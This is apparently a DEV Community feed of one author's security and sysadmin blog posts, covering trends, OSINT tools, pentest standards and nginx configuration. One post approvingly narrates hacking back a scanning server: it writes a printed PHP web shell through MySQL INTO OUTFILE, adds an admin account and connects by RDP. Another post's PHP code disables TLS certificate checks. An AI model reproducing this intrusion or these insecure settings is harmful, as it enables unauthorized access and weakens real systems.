DEV Community: Uladzislau Murashka

Cybersecurity Trends 2025–2026: Navigating the Next Wave of Digital Resilience

Uladzislau Murashka — Wed, 06 Aug 2025 08:16:50 +0000

Cybersecurity Trends 2025–2026: Navigating the Next Wave of Digital Resilience

In an era defined by rapid digital transformation, cybersecurity stands at the forefront of strategic priorities for businesses across industries. As we look toward 2025–2026, a confluence of emerging technologies, evolving threat landscapes, and tightened regulations will reshape how organizations protect their data, assets, and reputation. This post delves into eight key trends—from AI-driven defense to regulatory mandates—arming you with insights to stay ahead of adversaries and build resilient security postures.

1. AI-Powered Threat Detection and Response

Rise of Autonomous Security Agents

Next-gen security platforms will deploy AI-driven agents capable of autonomously detecting anomalies, isolating compromised assets, and orchestrating containment workflows without human intervention.
Behavioral Analytics at Scale

Through machine learning, security tools will establish “normal” behavior baselines for users, devices, and applications—enabling real-time identification of insider threats and credential misuse.
Adversarial AI Arms Race

As defenders leverage AI, attackers will adopt AI to craft hyper-personalized phishing lures and AI-driven malware. This duel requires continuous innovation in defensive algorithms and threat intelligence sharing.

2. Zero Trust Evolution in the Cloud Era

Cloud-Native Zero Trust Architectures

Companies shifting workloads to multi-cloud and hybrid-cloud environments will embed Zero Trust principles—continuous authentication, least-privilege access, and micro-segmentation—into native cloud services.
Dynamic Policy Enforcement

Contextual factors (device health, geolocation, user risk scores) will dynamically adjust access policies. Integration with identity providers and XDR platforms ensures consistent policy enforcement across on-premises and cloud.
SaaS-Specific Zero Trust Gateways

Dedicated Zero Trust gateways for popular SaaS applications (Salesforce, Microsoft 365, Google Workspace) will become ubiquitous, offering granular control, session monitoring, and real-time anomaly blocking.

3. Regulatory Compliance 2.0: From GDPR to AI Governance

Global Data Privacy Harmonization

Nations will intensify efforts to align data protection laws (GDPR, CCPA, Brazil’s LGPD), simplifying cross-border data flows while ensuring individual rights. Expect joint frameworks and mutual adequacy agreements.
AI Ethics and Accountability

New regulations will mandate transparency in AI-driven security tools—forcing vendors to disclose decision-making processes, data sources, and bias mitigation strategies. Organizations must document AI governance frameworks.
Automated Compliance Monitoring

AI and RPA (Robotic Process Automation) will continuously audit configurations, access logs, and data transmission channels—automatically flagging compliance deviations and generating audit-ready reports.

4. E-Commerce Security: Protecting the Digital Checkout

Secure Payment Tokenization

Expanding tokenization protects credit card and banking details—leveraging hardware security modules (HSMs) and secure enclaves within edge devices to minimize data exposure.
Bot Mitigation with AI

AI-driven bot detection platforms will distinguish legitimate shopper behaviors from automated scraping and credential stuffing—ensuring checkout performance while thwarting fraud.
Supply-Chain Transparency

Blockchain-based ledgers will trace product authenticity, software dependencies, and third-party plugin integrity—reducing risk from counterfeit goods and rogue code.

5. Automation & Orchestration: Streamlining Cyber Operations

SOAR Platforms Advance

Security Orchestration, Automation and Response (SOAR) solutions will integrate deeper with threat intel feeds and chatops, allowing analysts to resolve incidents via conversational interfaces and automated runbooks.
Crisis Simulations with Digital Twins

Organizations will employ digital twin environments replicating their entire IT estate—conducting realistic cyber-attack drills and resilience tests, then fine-tuning incident playbooks based on simulated outcomes.
FinOps Meets SecOps

Security orchestration will begin factoring cost optimization—balancing resource-intensive threat hunts with budget constraints. Automated policies will dynamically allocate compute power for high-priority security tasks.

6. Emerging Tech: IoT, 5G & Edge Security

Securing the 5G Edge

The proliferation of 5G-connected devices demands lightweight security agents and distributed firewalls at the network edge—ensuring low-latency protection for autonomous vehicles, AR/VR platforms, and smart factories.
IoT Device Identity Management

Robust identity frameworks, leveraging hardware-backed certificates and decentralized PKI, will authenticate billions of IoT endpoints—preventing device spoofing and lateral movement.
Edge AI for Real-Time Defense

Embedding AI within edge devices (cameras, sensors, routers) will enable on-device threat detection and encryption—reducing reliance on centralized analysis and mitigating network bottlenecks.

7. Human Factor & Security Culture

Continuous Phishing Simulations

Beyond annual training, organizations will run rolling, contextual phishing tests—tailored to emerging social engineering trends—and deploy micro-learning modules based on individual performance.
Security as a Board-Level Discussion

Cyber risk will be quantified in financial terms—integrated into enterprise risk management dashboards and regularly reviewed by executive leadership and boards of directors.
Psychological Safety for Security Teams

Fostering environments where analysts can escalate concerns and propose innovative defenses without fear of blame will improve detection rates and drive creative problem-solving.

8. Threat Intelligence & Collaboration

Industry-Specific ISACs 2.0

Information Sharing and Analysis Centers will evolve into proactive threat hunting communities—leveraging ML models to correlate data from diverse members and disseminate preemptive countermeasures.
Open-Source Threat Feeds

Collective intelligence platforms, powered by blockchain for data integrity, will democratize threat data—allowing organizations of all sizes to benefit from community-driven indicators of compromise (IOCs).
Public-Private Cyber Partnerships

Governments and private sector entities will co-develop incident response frameworks—aligning on shared playbooks, legal safe harbors, and real-time threat-sharing protocols.

Conclusion

As digital complexity accelerates, the intersection of AI, automation, and regulatory oversight will define the cybersecurity landscape in 2025–2026. Organizations that embrace autonomous defense, cultivate strong security cultures, and actively collaborate across industries will emerge more resilient against sophisticated threats.

What trends resonate most with you? Which technologies are you already exploring or piloting within your organization? Share your experiences and predictions in the comments below—let’s learn from each other and shape the future of cybersecurity together.

Part 2: Useful OSINT Tools

Uladzislau Murashka — Fri, 10 Mar 2023 15:14:50 +0000

In the previous section, we discussed various categories of OSINT sources that can be used for passive reconnaissance. In this section, we will focus on some useful OSINT tools that can be used to collect information on our targets. Some of these tools may require integration with online services that we mentioned earlier.

Maltego

Maltego is a powerful OSINT tool that allows you to visualize and explore relationships between different pieces of information. It is designed to gather information about individuals, organizations, and networks using various sources of information such as social media, public records, and domain name information. Maltego can be used to map out an organization's infrastructure, including websites, IP addresses, DNS records, and social media profiles. It is available for Windows, Mac, and Linux operating systems.

theHarvester

theHarvester is a popular OSINT tool used for gathering email addresses, subdomains, and other information about a target domain. It can extract information from various sources such as search engines, public databases, and social networks. This tool can help you to identify email addresses associated with a domain name, and can be used to perform reconnaissance on the domain's infrastructure. theHarvester is a command-line tool and is available for Windows, Mac, and Linux operating systems.

Recon-ng

Recon-ng is a powerful OSINT tool that can be used for information gathering and reconnaissance. It is designed to automate the process of collecting information from various sources such as social media, search engines, and public databases. Recon-ng is a command-line tool and is available for Linux operating systems.

OSINT Framework

OSINT Framework is a comprehensive list of OSINT tools and resources that can be used for information gathering and reconnaissance. It includes tools for social media intelligence, domain name reconnaissance, and email address enumeration, among others. The OSINT Framework is a web-based tool and can be accessed from any device with internet connectivity.

SpiderFoot

SpiderFoot is an open-source OSINT automation tool that can be used for reconnaissance and information gathering. It is designed to automate the process of collecting information from various sources such as search engines, social networks, and public databases. SpiderFoot is a command-line tool and is available for Windows, Mac, and Linux operating systems.

Conclusion

In conclusion, OSINT is an important part of any information security assessment. It allows us to gather information about our targets using publicly available sources. There are various categories of OSINT sources that can be used for passive reconnaissance, and numerous tools that can be used to collect information on our targets. By using these tools and sources effectively, we can reduce the attack surface of our targets and minimize the risk of data breaches and other security incidents.

Useful online tools for OSINT

Uladzislau Murashka — Mon, 18 Nov 2019 06:19:15 +0000

What is OSINT (Passive recon phase)?

Open Source Intelligence, or "OSINT," was defined by the Department of Defense (DoD) as “produced from publicly available information that is collected, exploited, and disseminated in a timely manner to an appropriate audience for the purpose of addressing a specific intelligence requirement.” This process is also commonly referred to as “Digital Footprinting.”

OSINT sources can be divided up into six different categories of information flow:

Internet: blogs, online publications, discussion groups, YouTube (videos) & Instagram, and other social media websites (i.e. Facebook, Twitter, Linkedin etc.). This source also outpaces a variety of other sources due to its timeliness and ease of access.
Public: governmental data, public government reports, governmental previous data leaks, hearings, telephone directories, press conferences and websites. Although these come from official sources, they are publicly accessible and can be openly used.
Academic publications, information acquired from journals, conferences, symposia, academic papers, dissertations, and these go under Professional sources of information.

Helpful online services for information gathering

Go.ScanForSecurity – This is a kind of mix where lots of solutions were integrated through API and it helps to identify subdomains, domains on the same IP, shows domain IP history, check for findings on OpenBugBounty and other useful checks.
Dnsdumpster is a domain research tool to find host-related information. It’s a HackerTarget.com project. Not just for subdomains, it gives you information about the DNS server, MX record, TXT record and nice mapping of your domain.
The OpenBugBounty platform can be easily used to see if there were any findings previously on tested target without sending any requests directly. This platform can help you identify issues such as XSS, Open Redirect and CSRF. This platform is also accessible through API, but I didn’t find much useful documentation for it publicly available.
VirusTotal can help you with subdomains’ enumeration process. It can show domain name history with IP changes, whether or not a domain was used for malware spreading and other useful information, including DNS reverse lookups. VirusTotal also has it own API which you can use, but it will be limited in the amount of sent requests you can send in the free version.
Shodan will give you all of the useful information about the target domain or IP address you could want, like open ports, used technology stack and possible vulnerabilities (you can use this data in combination with Vulners platform). The Shodan platform operates through API as well, so all actions can be easily automated.
With the help of the Hunter.io service, you can find tons of email addresses for specific domain name. Furthermore, it will show you sources where this information was published. API is available as well.

There are a good number of tools and methods available to find information about our targets in scope. The main thing is to correctly determine the goal in order to correctly collect information and not waste time in vain. Given the popularity of various social networks and the emergence of resources that perform massive scans or checks, the collection of information becomes only a matter of time and knowledge of such sources of information.

In next part I'll add some useful tools which you'll be able to launch from your PC, but still some of them will require integration with online services (including those, mentioned above).

About Penetration Testing: Standards and Guides

Uladzislau Murashka — Fri, 05 Jul 2019 14:03:00 +0000

What's this for?

Everybody knows that penetration testing process is some kind of "art". It requires knowledge of wide variety of technologies, OS etc, understanding of how things works. In addition, you should be attentive to details and have a rich imagination of how any weaknesses can be used, be it a system or a human.

Pentesters are unique persons with their own style of work, but in enterprise world and even if take into account commercial basics - we should follow some kind of standards to be sure that scope of works will be covered in full, we need somehow classify vulnerabilities - yes, here comes commonly used standards, guides and classifications.

Furthermore sometimes customers may even ask you about your plans and skills and you'll need to describe the process of work (penetration testing).

Popular standards and guides in penetration testing

The most popular standards comes to mind are:

OWASP Testing Guide - popular standard and guide for web application security testing, which covers lots of security checks against web application and it's logic.
OWASP Mobile Testing Guide - is a comprehensive manual for mobile app security testing and reverse engineering for iOS and Android mobile security testers which covers everything from deployment of testing environment to tools and techniques which can be used during security tests execution.
WASC - Old and extended guidance for web application security testing. WASC includes huge amount of security checks which security specialist can execute against web application. Officially it sounds like: "The WASC Threat Classification is a cooperative effort to clarify and organize the threats to the security of a web site."
NIST 800-115 - Very popular commonly used standard (including GOV) for network and infrastructure security evaluation.
Penetration Testing Framework - easy step by step guide on how to execute penetration testing (like from zero to hero).

Why should we use those guides

In the first place, the use of such guides helps to perform pentesting not only correctly, but also guarantees a certain minimum of checks that will be done by following the instructions from for example OWASP Testing Guide or NIST. All those standards are based on previously made mistakes and previous experience as well as on current and past statistics and best practices.

Let's highlight some key points:

Understanding of how pentest goes not only from the perspective of the performer but also from potential customer perspective (less questions to us).
We must do things right, from first steps. Thus we can rely on standards which are commonly recognized.
We must have some kind of basic minimum of checks performed, you won’t keep everything in your head and here again standards help us. Everything beyond - will be based on your imagination and experience.
All compliance checks are based on such standards.
If you don't know something - you always can refer to standards. Especially this is very useful when you just beginning your way in cyber security or you for example need to request penetration testing but don't know what questions to ask and how to create scope of works, how understand if specialists from hired company execute checks properly.

Vulnerabilities classification and proper risk assessment

Vulnerabilities can also be classified with help of standards and classifications. Let's take a look at some popular classifications:

OWASP TOP10 - used for web applications.
OWASP TOP10 Mobile - used for mobile applications.
CVSS - The Common Vulnerability Scoring System can be used for everything else.

When you need to create report and describe vulnerabilities, explain technical owner that this or that vulnerability is critical, how can you do this ?

All identified vulnerabilities (or security misconfigurations) should be somehow classified with such parameters like:

Severity
Likelihood
Impact (business) level

Based on results obtained from your scans and/or manual research you can correlate them later with information from OWASP or CVSS and assign specific level (i.e.: low, medium, high) of criticality for each vulnerability.

Joomla on Nginx: Making SEF URLs

Uladzislau Murashka — Tue, 16 Apr 2019 05:48:34 +0000

On freelance sometimes I have interesting tasks, working as admin and security engineer. This article will be about setting up SEF urls for Joomla running on Nginx. I have searched internets for information about how to set up such urls but didn't find everything at one place. Applying some solutions administrative panel didn't work properly or was shown for example "index.php" file, so here I will add simple solution for how to make things working properly.

Requirement was following: make redirects from www to non www domain, use only HTTPS, remove slashes and hide "index.php" file from the address bar.
Our stack: ISP Manager panel, Nginx + php-fpm and Joomla. Also want to mention that customer asked to change web server from Apache (was used previously) to nginx with php-fpm.

First of all, let's send users from http to https:

server {
     listen 80;
     server_name mysite.com www.mysite.com;
     return 301 https://mysite.com$request_uri; ##sending users to https with no www
 }

The line with “return 301 ...” indicates that this redirection is permanent, not temporary (code 302 is a temporary redirect). Now users will only visit us on https. Moving forward, adding the config for https and remove the www from the path (i.e., redirect users with help of “rewrite”):

server {
     listen 192.168.1.12:443 ssl;
     server_name mysite.com www.mysite.com;
     if ($http_host = www.mysite.com) {
         rewrite  (.*)  https://mysite.com$request_uri; ##rewriting path to non www domain
     } ...other part of the config...}

Here we set up a redirect from www and started the configuration under https. The next step is to remove the “index.php” file so that it does not show:

rewrite ^/index.php/(.*) /$1  permanent; ##hiding our index.php file

Next we have the standard nginx config, taking into account the work under SSL, here I do not publish it, but at the end of the article a full config will be available as it is. The next step we have is to set up the work of the SEF urls and remove slashes (i.e. if the user enters for example 3 slashes at the end, they will disappear and the page will load correctly, there will be no error like 404), but at the same time we should not forget about the correct processing of 404:

location / {
    try_files $uri $uri/ @joomlaurls; ## adding our processing rules
}
location @joomlaurls {
    rewrite ^/(.+)/$ /$1 permanent; ## removing slashes
    try_files $uri $uri/ /index.php?$args; ## setting up SEF urls
}
location ~ [^/]\.ph(p\d*|tml)$ {
    try_files /does_not_exists @php; ## processing 404
}

access_log off;
location @php {
    fastcgi_index index.php;
    fastcgi_pass unix:/var/www/php-fpm/www-root.sock;
    fastcgi_split_path_info ^((?U).+\.ph(?:p\d*|tml))(/?.+)$;
    try_files $uri =404;
    include fastcgi_params;
}

Our site will properly handle all the SEF urls, give 404 if there is no page, remove slashes from the address bar, and also hide the “index.php” file from the path, by default we will have the “index.php” file read from the folder so here no need to point at it directly.

One more thing about the admin panel - if the config is crooked, then the Joomla admin panel will not work at all, or it will open clumsily along the path “/administrator/index.php” and only this way, with the config that I gave above - everything will be processed and work correctly. Also in Joomla itself, you also need to activate the redirect function (in the admin area or Joomla).

Below you can find full configuration file I used on nginx with php-fpm:

server {

    listen 80;

    server_name mysite.com www.mysite.com;

    return 301 https://mysite.com$request_uri;

}

server {

listen 443 ssl;

server_name www.mysite.com; 

return 301 $scheme://mysite.com$request_uri;

}

server {

    listen 192.168.1.12:443 ssl;

    server_name mysite.com www.mysite.com;

    if ($http_host = www.mysite.com) {

        rewrite  (.)  https://mysite.com$request_uri;
    }
    rewrite ^/index.php/(.) /$1  permanent;

    ssl_certificate "/var/www/httpd-cert/www-root/mysite.com.crtca";

    ssl_certificate_key "/var/www/httpd-cert/www-root/mysite.com.key";

    ssl_ciphers EECDH:+AES256:-3DES:RSA+AES:!NULL:!RC4;

    ssl_prefer_server_ciphers on;

    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

    add_header Strict-Transport-Security "max-age=31536000;";

    ssl_dhparam /etc/ssl/certs/dhparam4096.pem;

    charset off;

    index index.php;

    disable_symlinks if_not_owner from=$root_path;

    include /etc/nginx/vhosts-includes/.conf;
    include /etc/nginx/vhosts-resources/mysite.com/.conf;

    error_log /var/www/httpd-logs/mysite.com.error.log notice;

    ssi on;

    set $root_path /var/www/www-root/data/www/mysite.com;

    root $root_path;

    gzip on;

    gzip_comp_level 9;

    gzip_disable "msie6";

    gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript application/javascript;

    location / {

        try_files $uri $uri/ @joomlaurls;

    }

    location @joomlaurls {

        rewrite ^/(.+)/$ /$1 permanent;

        try_files $uri $uri/ /index.php?$args;

        #error_page 404 = /index.php;

    }

    location ~ [^/].ph(p\d|tml)$ {
        try_files /does_not_exists @php;
    }
    access_log off;
    location @php {
        fastcgi_index index.php;
        fastcgi_param PHP_ADMIN_VALUE "sendmail_path = /usr/sbin/sendmail -t -i -f admin@mysite.com";
        fastcgi_pass unix:/var/www/php-fpm/www-root.sock;
        fastcgi_split_path_info ^((?U).+.ph(?:p\d|tml))(/?.+)$;

        try_files $uri =404;

        include fastcgi_params;

    }

}

That's it! Seems simple? But during research and implementation still some issues appeared which were fixed in configuration example above. I didn't work with Joomla before, mainly with WordPress so this case was actually interesting for me and possibly it may help somebody else.

Outsourcing: Pros and cons

Uladzislau Murashka — Tue, 19 Mar 2019 15:09:19 +0000

I would like to note some moments from the perspective of a person who has been working in outsourcing for almost 5 years. Before outsourcing I was working as 1st line support specialist, later moved on another position - ERP consultant / programmer, than moved again to another company and new position - Information Security Specialist / Analyst (SIEM, SOX audit etc).

After 8 months in infosec as analyst and SIEM engineer I have decided to change something again because such kind of work is routine and boring for me, so I changed company again and took position of Linux system administrator on commercial project, was like 2nd line support (remote).

Before I came to my current company, I changed 2 other companies and 3 positions, mainly companies were in the "product" model - retail, telecommunications when I always worked on one project, actually nothing major changed for me.

The advantages of this approach are that you concentrate on one thing, your specialization becomes narrower, but at the same time the knowledge is deeper and you understand more different aspects of the same product, you understand it better and you naturally see the results of your work. Although the development takes place exclusively within the framework of a single product or project, but the knowledge at the end is more in-depth and, if I may say so, high-quality, than you go everywhere a little bit and with a certain periodicity.

Already in outsourcing, I was able to try myself as a Linux system administrator and later at the beginning be a specialist, and later a team leader and project manager for penetration testing projects.

The positive side of outsourcing would be to highlight such things as the ability to quickly switch between projects, working not with just one project, for example, but projects are constantly changing - somewhere easier, somewhere more difficult and in general it gives new experience, new knowledge. If in the process of working on a project something is especially interesting, there is always the opportunity to study it in depth.

For me personally, it would probably be extremely boring to work for a long time only on one kind of project (4-5-6 years) and apparently in this regard, for myself, I chose the direction of outsourcing. Although I do not see the results of my work in the literal sense of the word - for example, on the development of some of my application or product on an ongoing basis, but at the same time I see these results a little differently - the direction is popularized, the team is expanding, we opens new competencies and we grow.

Of course, if we talk about startups, then working with the product in this case gives the feeling of opening something new, a little different sensations and perception of everyday life, rather than when you go on schedule, finish someone's shoals, you understand that it can last forever and the picture as a whole will not change with the same product, the sensation of the Groundhog Day is taking shape.

Pros

Changing projects
Working with wide varity of technologies
Meet more new interesting people
Traveling
More responsibility
As for self-organization - may not be always applicable because you not always have possibility to offer something or give advice to customer, but customer says what to do and how to do (slavery? :))

Cons

You may not see progress (if speak about final result in development, testing etc
This results are not yours :)
More of daily routine...
You need to meet not only your company requirements, but also customer's
Additional interviews with customers?
In case if you have no project within your main skills, you can be assigned for another project/division you possibly not interested in

About penetration testing

Uladzislau Murashka — Wed, 20 Feb 2019 14:14:10 +0000

In my work, I often communicate with customers as a leading specialist and a representative of the cyber security division in order to thoroughly discuss all requests and discuss all issues.

So, in the process of such calls and meetings, the fact that some customers are not completely aware of the meaning of such a service as a penetration test periodically emerges. Many for some reason confuse this type of service with an assessment of vulnerability or even a simple scan, there is also some confusion in the types of approaches to the implementation of projects related to penetration testing.

Someone can not decide what they need - penetration testing or vulnerability assessment, some do not quite correctly determine the desired approach, taking into account the specifics of the project.

Real case - a web application with a limited registration process, while the customer wanted to be checked in black box model, although according to the customer’s expectations, I immediately realized that it was a gray box and the possibility of performing a check from the user's personal account as well. Of course, summing this information, we came to a common denominator.

Yes, I understand that many clients do not have their own information security departments and it’s simply impossible for them to correctly formulate requirements for this type of projects. Of course, our main task is to help and guide them on the true path, which I do with great success.

But what is the essence of the problem? Perhaps this topic is not covered sufficiently? Or too much complicated terminology and not completely understandable approaches / processes?

Let's try here a little to deal with these issues.

The main types of security testing

Penetration tests
Vulnerability Assessment
Security audit

Types of penetration tests

Black box - we work with nearly zero information and we have either a link to the site, or just the name of the company. A goal of course is to compromise the application / network / any data (including employees).
Gray box - in this case we will work with some kind of near minimum data set, approximately at the black box level, but we may already have data for entering the application, for example.
White box - this is most often applicable when working directly from the customer’s infrastructure and inside the infrastructure, when we have a network topology, we know the IP addresses of the servers and what types of applications are used. Also, this approach is partially applicable to the projects related to the analysis of the source code.

Other types of security testing

Vulnerability assessment is a more automated procedure, in which there is an additional step of validating the results obtained and eliminating false positives. The main task is to find as many vulnerabilities as possible.

Security audit - we have all the cards in our hands: we have access, administrator-level privileges, or alternatively, we have copies of the configuration files. The main task is to study the solution used, the architecture, the software used and its versioning, methods for restricting access to and communication between systems.

In this post I was able to accommodate far from all the approaches and methods, but on the whole the picture develops something like this. I hope that this material will at least be able to help those who wish to conduct a pentest or an audit of their systems with the right choice of the type of service provided and the approaches used.

Restriction of user access to the website running on nginx

Uladzislau Murashka — Thu, 06 Dec 2018 05:25:09 +0000

One interesting problem about Nginx I've met on freelance - you need to restrict access to the site for users so that they can only go from search engines. Transitions from instant messengers, other sites and just direct visits to the site needed to be forbidden, in turn, for search robots to be allowed to index the site without any obstacles (direct access, transfer from other sites, etc., i.e., work without restrictions).

The server was on Ubuntu with Nginx as a web server, the site worked on WordPress, in general, nothing new. The implementation was supposed to be at the web server level, with nginx tools it was necessary to control who came from, the user or the search bot and issue the appropriate directive for subsequent actions - to give access to the site or send to the stub.

Changes were made to nginx at the site configuration file level, like mysite.conf for a single target host.

In order to more correctly determine who is who and where he came from, the parameters “$ http_referer” and “$ http_user_agent”, regular expressions, standard lists of bot agents, custom error page, rewrite were used to add several conditions to each them, the output is a condition of a length of 12 lines of code (you can still cut a little).

The logic of the nginx rules was as follows:

If the user came to the site directly or NOT from a search engine - assign him a marker "a"
If this is not a search bot, assign the marker “b”
We check for the presence of markers, if both are present, then it was the user who moved to a direct or from another site for example, respectively, we send it to the stub. Now let's look at the rules in detail.

The first condition:

if ($ http_referer ~ * "^ $ | ^ ((?! (google | yandex | bing | yahoo | mail | duckduckgo) \. [a-z] +).) * $") {
  set $ marker a;
}

What is what? Everything is simple, we ask nginx to check each user against the referrer where he came from. By the condition: “^ $” performs a check of an empty referrer or not - this is how direct visits to the site are determined. Next, we try to determine from the beginning of the line that the user came NOT from google, yandex and other search engines (in the regular expression, the construction?! Means no) well, and their corresponding listing.

I decided to list only the domains, but not their endings, the ending may be different for different segments of the Internet and therefore a more universal solution of the type [[az] + ”was used, which implies that there will be small letters and there may be few or many (from 1 and up ... a lot). A dot at the end says that absolutely anything can go further. A little earlier there is one more point - it is escaped by the “\” symbol in order to be correctly defined, like a real point, and not anything.

If this condition fulfills, then we set the variable $ marker value "a" and go on.

The second condition:

Everything is much simpler and more modest here, we need to define a bot or user by agent, they are standard in bots, they don’t change and therefore they were chosen as an example for checking (besides, there are fewer of them). The condition states that if the “user-agent” parameter does not match the mask for Google, Yandex, etc. - it means it is not a bot.

if ($ http_user_agent! ~ * "googlebot | yandex | yahoo | bing") {
set $ marker "$ {marker} b";
}

The use of an exclamation mark at the very beginning of the condition indicates that the discrepancy is checked, an asterisk is not a strict condition, and then the available agents of search engines from different search engines are listed accordingly.

In case this condition fulfills, then we assign the second value to our $ marker variable. The $ {marker} b construction is used so that the data from the first check is not lost, that is, we simply supplement it with the data of the second condition.

And, of course, at the end of all these validations, we can only verify the validity of our condition by a simple comparison:

if ($ marker = ab) {
return 403;
}

If the value of the variable after all performed manipulations is equal to the value “ab”, then everything worked correctly and we determined the user, respectively, and the fact that he went to the site directly or not from the search engine and you need to apply special measures to it, send it to the stub site.

See also Freelance Tasks: Problems with auto-renewing SSL certificates in ISP Manager
There is already at the discretion of the administrator, you can set the code of any error, for example, 403 or register a redirect to the custom page.

In my case, the complete solution was as follows:

if ($ http_referer ~ * "^ $ | ^ ((?! (google | yandex | bing | yahoo | mail | duckduckgo | website) \. [a-z] +).) * $") {
 set $ bot a;
}

if ($ http_user_agent! ~ * "googlebot | yandex | yahoo | bing") {
 set $ bot "$ {bot} b";
}
if ($ bot = ab) {
 rewrite ^ / (. *) $ https://website.com/index.html permanent
}

There is a “website”, which is the website of the customer, so that users can move freely within the website.

Security Testing: Fighting against bots

Uladzislau Murashka — Wed, 05 Dec 2018 09:14:42 +0000

A rather funny situation came out at work, once again after checking the incidents in the SIEM, the next scanning event was discovered. Some weird host from Brazil again scanned us for all sorts of vulnerabilities. It was lazy to write another abuz, I decided to see what kind of host and what can be done with it.

Immediately the first thing turned to the service 2ip and tried to find out what was hanging out there, what domain, but there did not give anything interesting. I started nmap and ran through the ports, and also scanned the directories, also nothing special, but the direct access to the server threw us into the dashboard of the XAMPP web server and there were links to different docks, guides, and ... phpMyAdmin

To my surprise, the MySQL database with hanging phpMyAdmin was not password protected, then there was already a technical matter. In addition to the database of utilities, we found a phpinfo file that reported to us the location of the dashboard in xampp and, accordingly, all the necessary paths to load the web went.

The next step is to check the login to the admin area, but as I wrote above, the root password was not set there and for this reason we had full access. Perhaps, during the installation (or after installation, when setting up the database), for some reason, instead of the local host, access to the database was made for the entire Internet. I assume that the root user was not assigned a password with the expectation that the base will be available only locally.

Because of this misstep, someone climbed onto the server to these guys and began to perform automated scans of random systems on the Internet for vulnerabilities, including our email and something else.

Well, lets continue our simple quest and go to the database:

As you can see - there is all access, then it remains only to show a flight of fantasy. As you know, web servers on Windows machines work as a system user, but this is already known. We just need to load the web shell and then stop scanning our infrastructure (for good - cut out all the malware, for the bad - just block our IPs on the internal firewall).

Load the web shell through the MySQL database using the INTO OUTFILE command:

Shell code itself:

<HTML> <BODY> <FORM METHOD = 'GET' NAME = 'myform' ACTION = ''>
<INPUT TYPE = 'text' NAME = 'cmd'> <INPUT TYPE = 'submit' VALUE = 'Send'> </ FORM>
<pre> <? php if ($ _ GET ['cmd']) {system ($ _ GET ['cmd']); }?>
</ pre> </ BODY> </ HTML>

Actually, this is probably all, further actions are quite expected. From the web shell we only needed to access the server in order to add a user, place it in the local administrators group and connect to the server via RDP.

So, this is not the less tricky way for one scanner of our infrastructure from the Internet. There were also thoughts to place a miner there, but the exhaust would be minimal and it was not worth it. As a bonus, I deleted other web shells from the server, I did not hang up the database password, because there, apart from the root user, there were no others, and it was likely that some application that worked with this database could have crashed.

When performing all the manipulations, only attackers who had hacked this server earlier suffered - their backdoors were removed.

How to create own threat intelligence platform with PHP, cURL and API

Uladzislau Murashka — Wed, 05 Sep 2018 15:24:02 +0000

Few years ago, when information security was not so popular as a commercial direction there were not so many useful services which may help you detect technical problems, security issues and vulnerabilities on your infrastructure or website.

Actually, the problem was not only in tools availability and quality but also in technologies used, people qualification and if speak about human factor - there was lack of information regarding how to make your code secure, availability of best practice patterns etc which aggregates with time from previous experience and innovative technologies.

As a good developer you had to check the code yourself on the vulnerabilities, as good admin you were need to securely configure your Windows or Linux machines/servers and again, everything was based on the experience of how to find and determine those problems/vulnerabilities and not many developers could do this properly. Here also we don't speak about penetration testing as it was not so popular and poorly promoted while not in trends.

From old news for past 5-7 years you can find many interesting hacks and exposures: Sony, international banks and many others, but how did that happen ?
Somebody forgot about test/staging server with default/simple/demo credentials, somebody used simple and popular passwords, didn't update after critical vulnerability was disclosed and all this led to serious leaks of confidential information as a result.

Today there are many ready to use, tested by time and community solutions on the basis of which, in order not to reinvent the whole bike - you can try to build and adjust the system for your needs. Yeah, many systems from this niche cost money but if combine them, correlate and analyze information from several such sources - you can have nearly the same output as from payed subscription from one of those systems ( just as an example, of course not for 100% the same :) )

Here the list of platforms which you can easily integrate through API:

Shodan
VirusTotal
Phishtank
Vulners
Open Bug Bounty

Let's he how does it work:

Through native PHP function we can find IP address of the domain name which we need to start our analysis
We sending IP/domain name than to Shodan and other platforms to receive all required data regarding IP blacklisting for spam activity and malware activity, can see IP addresses changing history (can help detect IP hidden behind WAF/CDN/Anti-DDoS services)
It may help you find possible vulnerabilities disclosed by bug hunters through OpenBugBounty project
Vulners will show you all available vulnerabilities for detect and outdated software installed on your server

In my case I also have added such services like "have i been pwned" and "IBM X-Force" to get more actual data regarding the target:

As you can understand there no need to be professional security engineer or developer to find out this data and make basic security check of the project, few things we need to do:

Find applicable services
Read API docs
Basically know php with curl

Below 2 functions, one for shodan and another for virustotal:


function shodanHost($host) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://api.shodan.io/shodan/host/".$host."?key=<YourApiKey");
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    $shodanResponse = curl_exec($ch);
    curl_close ($ch);
    return json_decode($shodanResponse);
}


function virustotalCheck($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YourApiKey&domain=".$url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    $virustotalResponse = curl_exec($ch);
    curl_close ($ch);
    return json_decode($virustotalResponse);
}

All responses you will get in easy to understand structured formats decoded from JSON which you can than just output as you wish. Based on such approach you can work with received data and develop possible attack or research vector.

P.S. Using of such services like shodan or virustotal for information gathering is not violation and you don't need to execute real scans against systems and services but you can obtain very informative data to find out possible security issues.